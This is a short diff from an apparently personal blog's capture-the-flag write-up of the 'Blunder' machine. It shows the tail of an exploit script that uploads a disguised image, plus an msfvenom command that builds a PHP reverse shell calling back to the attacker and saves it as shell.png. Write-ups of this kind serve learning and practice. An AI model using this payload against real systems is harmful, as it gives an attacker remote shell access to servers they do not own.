davidmckennirey/davidmckennirey.github.io/_posts/2021-05-12-blunder-write-up.md

     upload_evil_image(url, cookie, token, payload2)
 ```

-The exploit requires us to make a PHP reverse shell that we are going to save as an image file.
+The exploit requires us to save a PHP reverse shell as an image file.
 It handily gives us the commands to run as well.

 ```bash
 msfvenom -p php/reverse_php LHOST=tun0 LPORT=443 -f raw -b '"' > shell.png